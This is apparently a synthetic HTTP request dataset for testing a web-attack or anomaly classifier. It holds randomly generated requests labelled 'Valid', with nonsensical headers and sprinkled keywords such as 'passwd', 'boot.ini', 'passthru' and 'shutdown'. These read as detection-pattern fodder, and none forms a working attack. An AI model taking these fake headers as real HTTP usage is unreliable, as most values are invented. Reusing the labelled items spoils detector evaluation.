Transfer-Encoding: gzip
Upgrade: oitn/9.5
Warning: 030 103.121.67.250 "ereFagttoerTnEa" 
X-Serial-Number: 53018392304378
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ionlrttasa=tssoeV&D4rEfjfwaqMeee=rcpne@tiae scriptecnneSls&JnNroE==s9perlaubvbscriptaeaTa-&9esslv=9tzhl&esahrez=dbgsound&l3hScasn=1968&uylrmarN=hr_O&rktSBGMZVM=7115&ih=hiu&ngo=o8occints&passwdinputuncc:x&ho3os=e~cltuechildwp97et

End - Id: 39063
Start - Id: 4541
class: Valid
PUT /or0/eRHk3a_pq-RCam/aeShoCaeisttEv/aqaz6KsX1lNMWl/Vbodycm@IC/nweernwguohe/cE2T-ooz-WtNrF_YcF/Nc4schildJOhshutdown2cnph-/irwc0rtcaminhtwacraI/rZRde.dll? HTTP/1.1
Content-Length: 167
Content-Language: trp,oneavHms,yhRcwrzc
Content-Encoding: identity
Content-Location: http://www.sruIc0.net/1ctAeeah/8Cyi/txeu/etel/lueue.fgf
Content-MD5: bmt3b25Jem5oaG5yc2p0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Mar 08 12:29:16 GMT
Last-Modified: Sun, 30 Dec 07 09:05:39 GMT
Host: www.neeDedm.cz:608
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6462
Client-ip: 44.205.122.72
Cookie: iiat8Titdrvtea0=69;eeBokenv=0115022;.Rq3mDuOZJ@=wod
Cookie2: $Version="0"
Date: Fri, 25 May 07 02:12:38 CET
ETag: "vyFDRBMmVeKdQPmYi"
Expect: 100-continue
From: ejuo@FxhthsevrC.org
If-Modified-Since: Tue, 15 Jul 08 12:01:03 UTC
If-Unmodified-Since: Thu, 22 Jan 04 20:29:08 UTC
If-Match: "FGcPOtxmefus.D6mG"
If-None-Match: *
If-Range: "qTy2J5FWQPWyyoS6IUnw"
Max-Forwards: 533
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: siAwto Meexad=tnbnonc
Authorization: NTLM b0lzdHRodm5haHloOHVzb2dlZXVmZWl5YXJwZWlhd3Q3b2VyZQ==
Range: -574,-888
Referer: /TEad/lpM3stl/sahce.cgi
TE: trailers,trailers
Trailer: Host
User-Agent: dsni8aGi2idznnPcennh
UA-CPU: 68000
UA-Disp: 453,6755,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3467x636
Via: 8.8 230.108.108.78, 1.4 251.12.237.233, 2.5 www.ognjssy.jpg
Transfer-Encoding: identity
Upgrade: eeeR/1.4, lraael/3.5, u9uae/3.3, hiinha/8.5
Warning: 831 23.54.115.116 "diole" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 3502592947327155
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

18riMdaenar=gctqoNrcnzels4sey&ohndzbftLhnstf=q1xx7M&atitbE=ykTTa.K&YNu5k=5627096&lhgsorhHadsh=tmEaaixEy&s9=ob1a&n2lmgo8crad=mamNhocat0&ghzi=g@ftp&beonTms5jd1=8718412

End - Id: 4541
Start - Id: 18474
class: Valid
GET /aitvTnTvn/ogufjn4sn/eI1tStdinoEnvs/adocument@.asp?AlikeJE=aroRmtiformo+c%40i+eb&XvAF=epiusriy%7E%3A&duA=4VQkfYZF&ee=9165875493&oO=ite8aghtfueekemz&toireeqaLrBwiia=mGltQWIRz%40Ch&3aseoteq=b&TpiheHb=ue3ee&6havingg@allwA37Wwindow.openY=1805048982&sNtlnisiyR9a=1&qatsJur=%5D%5CornpOz%5Bue1iacy&rht=uv%7Eees HTTP/1.1
Host: 75.200.156.70:64348
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, cp-950;q=0.2
Accept-Encoding: deflate;q=0.7, identity, gzip;q=0.4, gzip
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 117.10.196.6
Cookie: jnhaSwhuhtqwc=e8Mn;laei=v@t?;ekbt=&Lie8toztpxaru;4rdeeisfpH=jnniEs;newcvwttiZRncY=s7m 
Cookie2: $Version="4"
Date: Fri, 13 Apr 07 09:34:34 CET
ETag: W/"kcQq-97mGk7WVeND3ug"
Expect: jzie
From: ee1e@sacey.de
If-Modified-Since: Thu, 21 Apr 05 11:27:34 CET
If-Unmodified-Since: Mon, 23 Mar 09 18:41:50 GMT
If-Match: *
If-None-Match: "pnYK21Tvs2hrbYv"
If-Range: "C2JVHl8ZVPfAP15"
Max-Forwards: 47
MIME-Version: 1.9
Pragma: e5pejj='us'
Proxy-Authorization: Tlld muno=taet
Authorization: Digest cnonce="9Nlhaaeo"
Range: 72-79
Referer: http://h8ptq.it/rNjiat/hNbi/pEatti/niebsy.mp3
TE: trailers
Trailer: Via
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 6.8; dy-t7; rv:7.9.5) Gecko/97862845
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: FTP/5.5 240.8.236.13
Transfer-Encoding: gzip
Upgrade: obxu/3.0
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 238.93.64.167
X-Serial-Number: 63866719
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18474
Start - Id: 30023
class: Valid
GET /_cMPa/gEWp3G.w/eIe/maEtouaEHuedcgeeehda/ekBemeafteateSahdrGe.html?jahsrufneaer=l+wrhuaeemt&hiytSi=7s&eehckoregh=ukpmfgn&mo9emahx=eHNHh._xKQb1&rto4sm=955850 HTTP/1.0
Host: 65.1.155.229
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, us-ascii
Accept-Encoding: 
Accept-Language: y-bncst;q=0.4, Wst-gi;q=0.3, tuanW-stasa2;q=0.0, uph-ite7
Cache-Control: no-cache
Client-ip: 216.112.60.109
Cookie: qserRpnbvi=locationnew s;Oen84waieo=4jDqg5_G7B@;nksIcreeedfnurk=05;pQIGQkF3IM=w2ZPGGgAw
Cookie2: $Version="72"
Date: Sun, 22 Feb 09 09:32:40 CET
ETag: W/"BvopIOj24Q2Ts1ddJqx"
Expect: 9hniwaa=4dseoat;eiens=otoBt
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Fri, 17 Oct 08 08:58:42 GMT
If-Unmodified-Since: Fri, 18 Jan 08 08:09:37 GMT
If-Match: "2hJQ221nByWWzfgRIq."
If-None-Match: "@HC4xLV1ZPEou3Qnc"
If-Range: Thu, 11 Oct 07 21:24:13 GMT
Max-Forwards: 5767
MIME-Version: 8.0
Pragma: neseern=rhto
Proxy-Authorization: yitanN eiz5i=odeihx
Authorization: hsoqm Ia9nrmch=rq0w
Range: 873888-,-667435,809054-93
Referer: http://ttxmn.biz/9Evm3kv/qvoo90iT.jpg
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.8 (X11; U; Linux i386 1.2; ro-mn; rv:3.3.5) Gecko/84979976
UA-CPU: StrongARM
UA-Disp: 618,258,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4656x573
Via: HTTP/1.5 www.vNwb.css
Transfer-Encoding: identity
Upgrade: xo1itu/7.4, olnwaa/6.2
Warning: 840 www.fmip.htm:1 "ZCdsohe" 
X-Forwarded-For: 23.247.167.67
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30023
Start - Id: 22299
class: Valid
GET /cvxyy/Crb/ol.gif?pernNaxyrtaslos=099302555&eaerdhr3=t65h0nHMfzn&efO=tm2t%3CjgrleE&tags=ahac1%3Bedhrft%5Cs HTTP/1.0
Host: 59.228.255.65
Connection: keep-alive
Accept: image/*, video/quicktime, application/*;q=0.9
Accept-Charset: x-mac-turkish;q=0.5
Accept-Encoding: 
Accept-Language: lleyhei7-3;q=0.1, 6leD-ewb;q=0.9, 5pTn-uu;q=0.5, 0lierneo-oieapw
Cache-Control: no-cache
Client-ip: 69.235.32.97
Cookie: v1aB8wwchild._M=55460274
Cookie2: $Version="055"
Date: Wed, 12 Sep 07 15:46:10 GMT
ETag: W/"D0mjpQdG3YLo7yYuFX"
Expect: 100-continue
From: meieT@Nncr.uk
If-Modified-Since: Wed, 20 Sep 06 16:28:35 GMT
If-Unmodified-Since: Tue, 31 Oct 06 08:22:03 UTC
If-Match: *
If-None-Match: "nHUtFjyK0HMG@ez98"
If-Range: Sat, 24 Oct 09 04:47:59 CET
Max-Forwards: 54
MIME-Version: 9.6
Pragma: rueFsA='b'
Proxy-Authorization: uqixi Seahybt=9db7d
Authorization: Digest nc=fF9FbcCd
Range: 9-868,35-5019,48-
Referer: http://eaedD.be/frwt.png
TE: chunked,deflate,trailers
Trailer: Expect
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 0.5; ml-tu; rv:4.9.1) Gecko/59292899
UA-CPU: PowerPC
UA-Disp: 730,116,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6713x3375
Via: 7.5 www.faorntit.js, 7.9 153.76.135.117, 0.6 www.ercxt.html
Transfer-Encoding: aQ7u3c; leau=tieta
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 280 www.eltat.html "yentslisdesbl65tssp" "Fri, 26 Jan 07 16:55:10 UTC"
X-Forwarded-For: 111.239.10.121
X-Serial-Number: 35178476793
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22299
Start - Id: 31399
class: Valid
GET /nk5omAHeqZOFidvgfP.gif?JC5admin=he2pt9ntvfwluo&ntidRnsn=epI++imd&ip3kmthuTno=76&ysmtduhoLmy=o HTTP/1.1
Host: 76.82.210.202:1163
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.2
Accept-Language: 8e6abk-ke;q=0.4, u-4o2, 6atnxsp-dyxanr;q=0.9
Cache-Control: min-fresh=17
Client-ip: 94.233.71.72
Cookie: t-TLVTDtUV=swhereh lnb\</node~wLo&s4m;ofe=35st9
Cookie2: $Version="0"
Date: Mon, 13 Jul 09 07:10:37 GMT
ETag: "MVtyvOfwt3vQ32x"
Expect: ksz0tj=gye9t
From: Tzeuatea@eoges.de
If-Modified-Since: Fri, 08 Aug 08 04:44:35 CET
If-Unmodified-Since: Sat, 25 Feb 06 03:11:15 GMT
If-Match: "@W5sKhNV1O.uCONWmL"
If-None-Match: "2-SXK8axRosStnNBa"
If-Range: *
Max-Forwards: 5497
MIME-Version: 4.6
Pragma: et=5
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: NTLM dmxseXRsaWlpckNTaEFhamhybmVoNk9zZW5oaWNoZW4=
Range: -6182,52054-760058,9-
Referer: http://aslz.ch/pwAy/ndAe8pse/hrhN/hEmo/fuErsn.pl
TE: deflate,deflate;q=0.8,trailers
Trailer: TE
User-Agent: ry_XHEdhkm http://www.dade.net
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: 0.0 www.Minr.htm
Transfer-Encoding: deflate
Upgrade: eiKz/4.5, tfe/0.1, nnhn/4.9, fptn/7.8, iuaOf/8.9
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 160.213.53.125
X-Serial-Number: 886445544
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 31399
Start - Id: 28987
class: Valid
GET /uK9X8dC2rUIR9CNOqk/3owDhX_AXKx/Ocul0lmewivsvrhIDnls/ruq7Oqrnbtdx8yRsk/yQHRBuzLPHqcyLlY9u.J.png?kteztlntt=%7Cayie&eaasnlIhh0nnca=62&ebxhmenEidt=2ovme%26e%5Dwn&csc2Hou=fand62r&hne1rrrjPufo=a HTTP/1.0
Host: www.ao1oynw.biz
Connection: qddli2
Accept: */*
Accept-Charset: macintosh, cp-950, koi8;q=0.1, iso-8859-6;q=0.0, gb2312
Accept-Encoding: 
Accept-Language: o-cclor;q=0.2, mpot-jo;q=0.0, Nr-Fe;q=0.2
Cache-Control: max-age=6
Client-ip: 40.93.233.194
Cookie: da=18600
Cookie2: $Version="2"
Date: Sat, 28 Jun 08 14:49:52 CET
ETag: "6W6lizwmf3Sl4Tos"
Expect: na2f=odrapD
From: zatnI@tsoae.gov
If-Modified-Since: Wed, 24 Dec 08 23:40:58 UTC
If-Unmodified-Since: Sat, 17 Sep 05 09:45:25 GMT
If-Match: *
If-None-Match: "8aH6KyUaHnPSnnb8"
If-Range: Mon, 16 Feb 09 19:00:25 CET
Max-Forwards: 1
MIME-Version: 1.3
Pragma: tLTv89t=eKe5p
Proxy-Authorization: Digest qop=auth
Authorization: Digest cnonce="crce"
Range: -48236,695-,-4
Referer: http://6otuhsse.it/snnu/aro3o.jpeg
TE: chunked;q=0.5,gzip,chunked;q=0.0
Trailer: If-Range
User-Agent: aj2tbpz http://www.hdle.it
UA-CPU: MIPS
UA-Disp: 011,231,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1053x1221
Via: 7.4 www.hhha.shtml, FTP/2.7 www.elae1n.jpg
Transfer-Encoding: deflate
Upgrade: ou1/8.3
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 91.46.165.1
X-Serial-Number: 055751373307057
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 28987
Start - Id: 10797
class: Valid
GET /hM/hf/gatiitrnu/YpYLd/ak4mqf-xe/H-/winntI3yfrom4XsMl/Nuoldl1to/7zypv0Bh/hIeLCF.html? HTTP/1.0
Host: 243.232.94.159
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932, x-mac-icelandic;q=0.3, cp-950, x-mac-arabic;q=0.7, windows-1254
Accept-Encoding: *
Accept-Language: cihbrU-lihah, 1fgevo5-i1osyn;q=0.9
Cache-Control: max-stale
Client-ip: 25.225.101.88
Cookie: DWae=4O@Sl;L0YIsZtdX5=omb;rpt8d=87407
Cookie2: $Version="9"
Date: Mon, 17 May 04 02:51:26 GMT
ETag: "fNmsx9usxqQx6nMj2L4"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Mon, 07 May 07 23:08:39 CET
If-Unmodified-Since: Thu, 28 Jan 10 10:17:41 UTC
If-Match: *
If-None-Match: ".3eLlFo2BvDD3zJRc"
If-Range: "5pX0riV0i.EErHO_pwkX"
Max-Forwards: 05
MIME-Version: 7.4
Pragma: dses=f
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM dXBlaHJ0bWN2VGxlSG45cGVjZXRzQWl1dHNpNHR1N3F0ZmFoU2lpOWVpNA==
Range: 2-
Referer: /n5mar.html
TE: trailers
Trailer: Warning
User-Agent: erni (a@jxd_GYb; jbL3iiBqzL)
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6046x3578
Via: 4.3 239.58.136.67
Transfer-Encoding: deflate
Upgrade: dec/3.8
Warning: 774 www.dijag.css "sedtyunrietbnTe" "Sun, 26 Feb 06 01:26:33 CET"
X-Forwarded-For: 228.129.199.161
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10797
Start - Id: 16783
class: Valid
GET /zctd0hc/nrOUhwDmm3v9PSVU/a0dLora6/nned/Osj8rtshogrsv/HEvnBhhsa/fvrato1esmruesci/hQ/d0RYLvC_kd5ZMYP2TR/FrWtnvreyete/s8R.gif?6ecgeot=u3qoqlY HTTP/1.0
Host: 51.130.206.246:80
Connection: t0LO
Accept: text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 103.225.225.209
Cookie: eenRmdntevnnr=tygEbsixan;baice7esah4ia=s;nrdrgIlmte=1299855991
Cookie2: $Version="90"
Date: Wed, 01 Jul 09 13:16:51 GMT
ETag: "ZFxEHIHXibeUncC"
Expect: 100-continue
From: a2jc@3Dx4eae.st
If-Modified-Since: Wed, 11 Feb 04 24:25:58 UTC
If-Unmodified-Since: Fri, 04 Aug 06 24:11:58 UTC
If-Match: "9GnWJjqNOZwI7CDya"
If-None-Match: "EAZ1Mo.VCo64wt7P9"
If-Range: *
Max-Forwards: 817
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: di9m iJo2=fseyces
Range: 1-,-097,-093856
Referer: /ideos6/0u6enc.swf
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.2 (Windows; U; Win98 7.2; cn-us; rv:0.3.9) Gecko/98017021
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 561x3269
Via: 3.6 70.249.173.134, 2.0 www.rSronR.html
Transfer-Encoding: oeta
Upgrade: rtte/6.2, sdt/4.5, rianin/5.6, eelurI/6.7
Warning: 119 91.175.12.37 "mds7frsi" "Wed, 09 Sep 09 13:18:37 GMT"
X-Forwarded-For: 126.157.223.224
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16783
Start - Id: 16786
class: Valid
GET /q2pvupkCf6/3dWE6xrSTV3ukjIMM/atrSut/lZXerotn7atspn6tnge/sv0zI/PY4dklsQMinb/6hoQale5eIokatub8d/e@.I6Fdz2.BDi00@D/deH@8/fPDEg-WwHYDUR.html?o3pnS2ehsr=de+hs%3Bn-%5Cqcpassthru%3Aev+1osi&tu6rdi0=stUozSiEncn6dpsxs&tEx=1&teskjo2tnat3gba=s1he+++ns2nEsock_streamarg HTTP/1.1
Host: www.i9l9o.st
Connection: wtiplibu
Accept: video/mpeg, application/*
Accept-Charset: iso-8859-3, iso-10646-ucs-2;q=0.9, macintosh;q=0.9, windows-1257;q=0.5, iso-2022-jp;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 226.239.54.117
Cookie: pqd=]o:qhevi;oalpsznA=8564;at=?tS  'c7an3connect;eetntInqei7eb9=clxnyg|dprocessing-instructionr
Cookie2: $Version="90"
Date: Sat, 17 Jul 04 20:17:17 UTC
ETag: "WA81wnCTFb8KE9xI0eL6"
Expect: 6ysu25e=owal6dqd
From: a2jc@3Dx4eae.st
If-Modified-Since: Wed, 11 Feb 04 24:25:58 UTC
If-Unmodified-Since: Tue, 30 Sep 08 15:22:22 CET
If-Match: "uoGPYz-@.V60.vmpYLl"
If-None-Match: *
If-Range: *
Max-Forwards: 817
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: waltgc e3noc9Tc=do3hgnm
Range: -8,8006-,-51094
Referer: /kdis/gt2clI/seiNJ/sdstz.tiff
TE: gzip;q=0.3,deflate;q=0.0,gzip;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/2.8 (compatible; Konqueror/1.8; Mac OS X; faree; alr4l)
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 561x3269
Via: 2.5 207.108.229.6:352
Transfer-Encoding: compress
Upgrade: rtte/6.2, sdt/4.5, rianin/5.6, eelurI/6.7
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 126.157.223.224
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16786
Start - Id: 14788
class: Valid
GET /i_.2_drop6exCQ/ihXH_3pc3RN/9dlhtresm/nbsaryor/troixAetns9nmhuya/p09CeLLPVl7hKSaOwB.shtml?rgjn=lMg+system&oIteShofn=+ftp&r4enrnlesmaornq=21&1ID@mp=eE1oyan&e78aAaeLe=fwfbsLhtnit9stekmw&7eS0swscfUtCtt=ig-ge%3AfeEdb&AC0Xq=cDfoPX0&GrW0oP=rdfIQ&bJ1BboGY=9&pro_PBBlK=8228986&xhtpass2OsWIhmchild=euso%27&llo=543&hhoOense=015&drN3w=ib%26hq2a&rra2dso=e6%27%3Ambluhi HTTP/1.1
Host: 154.80.172.214
Connection: keep-alive
Accept: video/quicktime;q=0.4
Accept-Charset: iso-8859-3
Accept-Encoding: identity;q=0.6, gzip;q=0.2, identity;q=0.3, deflate, compress;q=0.1
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 104.98.203.85
Cookie: sidnhrrrrtusi=iui5;roEeli6DAd=1(;R6L_bEopt=%(geiamrqlibFeqtns=&;N6nph-.=722354;toartpnmvs2=827513
Cookie2: $Version="671"
Date: Fri, 08 Aug 08 08:49:49 GMT
ETag: W/"_8gE6FhqB.1.hyLdc5U"
Expect: rpoat
From: nOeesl@pemet.it
If-Modified-Since: Thu, 04 Feb 10 14:04:09 GMT
If-Unmodified-Since: Wed, 05 Oct 05 11:27:35 CET
If-Match: "tbmAW32F47ebW5bn"
If-None-Match: "WY2PeiyIZEI3Pud"
If-Range: Thu, 19 Feb 04 04:45:47 UTC
Max-Forwards: 49
MIME-Version: 1.7
Pragma: aswrrth='neyrajlj'
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: NTLM NGVpZWpzdDZyckVkbHRpZ3R5bnVubnZlUG51aDh3aXRvaWFhZQ==
Range: -902734
Referer: http://ne3hu.ch/gA2o/nInd2wd/yrns.zip
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.9 (X11; U; SunOS sun4u 4.0; hu-ea; rv:0.1.4) Gecko/19468493
UA-CPU: Sparc
UA-Disp: 9935,4527,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1881x145
Via: FTP/6.6 www.vwnctsig.jpg
Transfer-Encoding: tirnn; tiYn=N0u4wiao
Upgrade: snemam/8.9, trd/0.2, ysb8i4/8.3, tiEie/9.8
Warning: 389 57.107.55.77 "ixtnuciisLc1" 
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 53821582673428600295
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14788
Start - Id: 19503
class: Valid
GET /y8iwTA.html? HTTP/1.0
Host: www.snad9.uk:591
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-6;q=0.4
Accept-Encoding: identity, gzip, deflate;q=0.5, identity;q=0.8, compress;q=0.1
Accept-Language: *
Cache-Control: annc=5recRto
Client-ip: 18.139.125.60
Cookie: dmtfsOh=975;Tleih3fc9=;@Fm;dehre=isu7coNbin;IhjSe0=estyle;atere8=brprocessing-instructiona7Zacoo/ug'riboot.ini;Ieeamh4t=han z/dn
Cookie2: $Version="6"
Date: Sat, 12 Jul 08 01:58:10 GMT
ETag: "SVrVwZJDn6pIgWdg"
Expect: 2Ma4nc
From: scdiN@rl4aweo.com
If-Modified-Since: Tue, 17 Aug 04 04:47:17 UTC
If-Unmodified-Since: Mon, 11 Oct 04 16:52:55 UTC
If-Match: "kBkx9LFXDvuuU..K6x"
If-None-Match: *
If-Range: Mon, 13 Jul 09 19:03:57 GMT
Max-Forwards: 8364
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: NTLM S2hyVGRsYWlscmhyb29sZWVvc29lcm9lYXNtcW50YXpKaw==
Range: 3024-,3311-971779,259112-9
Referer: /a1nmctei/euPo/Dhftn/Dhierwo.pdf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.2 (compatible; Konqueror/1.5; Win 9x; lresoltrrc; iiee)
UA-CPU: x86
UA-Disp: 4215,3072,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 570x2839
Via: HTTP/0.5 35.108.79.220
Transfer-Encoding: compress
Upgrade: ohta/3.9, eni/1.7, ar0e/8.0
Warning: 268 166.16.219.16 "mps4ifoosslaoso" 
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19503
Start - Id: 7174
class: Valid
PUT /VCYrg5.php3? HTTP/1.0
Content-Length: 18
Content-Language: Rte3iF,hntpv,t6ron
Content-Encoding: compress
Content-Location: /serf/es8ne/6deeaeNH.php3
Content-MD5: ZW1TbmVlaWNldFRsb2Nubg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Aug 09 17:44:41 CET
Last-Modified: Mon, 25 May 09 16:50:25 GMT
Host: www.lChsraomey.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.1, compress, gzip;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 143.244.115.21
Cookie: bamo=sndm1;rtr=ikta4ccujtelikem(;ehtenonrYomeoes=b7@bFtKi7O;yIpted1=vrwinnt?bkcboot.inics8cx;JczKrcpuMJXshutdownunion=sthe33ugsas;W8wb3=fromRepa
Cookie2: $Version="19"
Date: Fri, 18 Nov 05 20:37:30 UTC
ETag: "DCQXzbIa3QQxm.F7R5M"
Expect: HdnoTor
From: a0Qar@yilcQa.net
If-Modified-Since: Mon, 10 Jul 06 23:58:04 UTC
If-Unmodified-Since: Tue, 03 Aug 04 05:52:06 GMT
If-Match: "aiCcdabKqB0QDsoKjkA"
If-None-Match: "2BrKhw7N9WEkf2A3xW5"
If-Range: Thu, 29 May 08 07:43:51 UTC
Max-Forwards: 22
MIME-Version: 8.4
Pragma: ntet='7op'
Proxy-Authorization: Basic YWhsbzpudGRlZQ==
Authorization: NTLM bmZodmF3VG9veGUxaGRobHVubmVzb3VzZWlpcUFmc2RlSHRzbGxlZTlsMWF1Uw==
Range: 21-
Referer: /frctot.shtml
TE: chunked;q=0.8,gzip;q=0.7
Trailer: Pragma
User-Agent: Odshekjeytyabry
UA-CPU: MIPS
UA-Disp: 337,1594,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7035x878
Via: HTTP/1.9 www.uhoTp.gif
Transfer-Encoding: ui0uit; mnh1ae=p5p3ttj
Upgrade: ootqah/6.7, il5/2.2, feDseo/1.9, sce/8.2, s2ch/9.0
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 199.16.54.101
X-Serial-Number: 94479468040904290
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

27f=llR nTc lvtb5s

End - Id: 7174
Start - Id: 24372
class: Valid
GET /saxoi4r8h4tigjXet/e-Sz6FDeO3/owq-Yh7/EYumHeadnjaIsmsiey/cXRJESoT@mwsuo0T@FA/ersoiootoh0ejopwt/iia0eae.png?eIe5I5nafmo1nr=242901174&8oHcSW1eUcmdpl=ihunl&tEhRhr=ouhelrrrrioE&teler0=i%24p&childMRJ2fG2Clocation=543&mOaidUlm9u=tOFHkL2&c9ilslehUodoool=3&vJaetce7OO=5745898&tautjrnn=tl+t%3Crhtaccesyscript+&7zAVreplace=1c8LHXaUb0QU&senapyhyt=o+uhue0o&1hevd=gobject HTTP/1.0
Host: www.ifntdabfi1.ch:08282
Connection: uset3
Accept: application/*, video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1, identity, deflate, compress
Accept-Language: dearanoo-1;q=0.2, hd-te9jd;q=0.2
Cache-Control: max-age=3373
Client-ip: 27.107.78.108
Cookie: eeEfs=0awherelocationnullhaving:;es=575346;eefoes=3806;s4nesrNaraeed=xm?7e eIsystem~;GcbFFvX=ic3ey1xI;8zno4st3freeba=77618689
Cookie2: $Version="166"
Date: Sun, 22 Mar 09 23:05:12 UTC
ETag: W/"iGg4GyFoonVM8sn"
Expect: aedo=aeestted
From: 1egsitm@nl59d.com
If-Modified-Since: Tue, 30 Sep 08 07:47:12 GMT
If-Unmodified-Since: Tue, 05 Sep 06 11:00:03 UTC
If-Match: "yYGES_v1HjlcEByI6"
If-None-Match: ".zQxvi9tOrTu3W_nEJ"
If-Range: *
Max-Forwards: 0825
MIME-Version: 0.8
Pragma: hun=St0ipnes
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM MHBpb2k1aml5ZmFldnI3ZGx2ZTl1bmxhbnJ0cmVjb1RzbTJ1Y29lOA==
Range: 97-,0-
Referer: http://8ArFhna.uk/soxElip5/baeie3r/yEyo/uneutons/0oWbbih.jpeg
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.4 (compatible; Konqueror/0.2; Mac OS X; yiasf2y3; adi0erngtn; soiugnhmkd)
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2262x1293
Via: FTP/6.6 11.56.54.96:5210, 2.3 www.etDoo.tiff
Transfer-Encoding: identity
Upgrade: dl2nol/1.8, hopeH/5.6, tvmd/4.2
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 6737813475044771
----: -------------
